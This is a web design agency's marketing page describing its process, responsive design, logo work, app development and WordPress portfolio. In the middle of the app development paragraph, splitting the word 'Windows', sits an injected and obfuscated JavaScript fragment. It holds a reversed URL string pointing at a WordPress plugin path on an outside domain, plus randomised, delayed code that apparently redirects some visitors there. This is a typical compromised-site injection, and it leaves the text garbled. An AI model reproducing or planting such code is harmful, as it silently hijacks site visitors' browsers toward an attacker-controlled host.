From an idea to success – Your new website:
Planning and analyse
To make sure that we are all on the same page, we will discuss with you and analyse your project. Then we will move on to design. A User Interface Specialist (UIX) will work on basic functions for your website and look at your competitions websites to help you get a lead in your industry.
Design and creation
Our professional team of designers will collect high resolution images, fonts, icons and animations that are created for your specific industry. When the design is finished we will have our developers tie together the whole project.
We will trouble shoot the website in the most common web browsers. This is to make sure it is loading properly and can handle a lot of traffic without messing with the user experience.
We will go live with the website and hand over your finished product to you.
Responsive web design (RWD)
Responsive web design is a website design that allows the layout to change depending on screen size and screen resolution that the website user is currently browsing through. Amount of columns and pictures can be fixed automatically, and pictures can be adjusted mainly according to the screen size.
Graphic profile and logo
We create unique logos and graphic profiles that will stand out for large and small businesses. Something familiar combined with a professional touch creates a great company logo. This branding identity process is a onetime investment that you will be using every day for marketing. When the customers think of you, they will automatically think of your logo and we will help you become unforgettable.
App development
A mobile application, mobile app or just app, is a small configuration program for mobile devices such as smart phones and tablets. An app can also make use of the smart phones hard drive, for example the camera, GPS tracker and built in functions like the contact lists. We create apps for the biggest platforms which is iOS, Android and Wintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dows phone.
Our latest portfolio
Here you will find some of our recently launched websites. All websites we have created and delivered to our customers, are built and developed with WordPress. This is the world’s biggest publication tool. WordPress allows our customers to be able and administrate their websites in a few simple steps.
Web design
small businesses
B2B and B2C
for big and small companies
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biggest CMS tool
for all your channels
campaign today
to music videos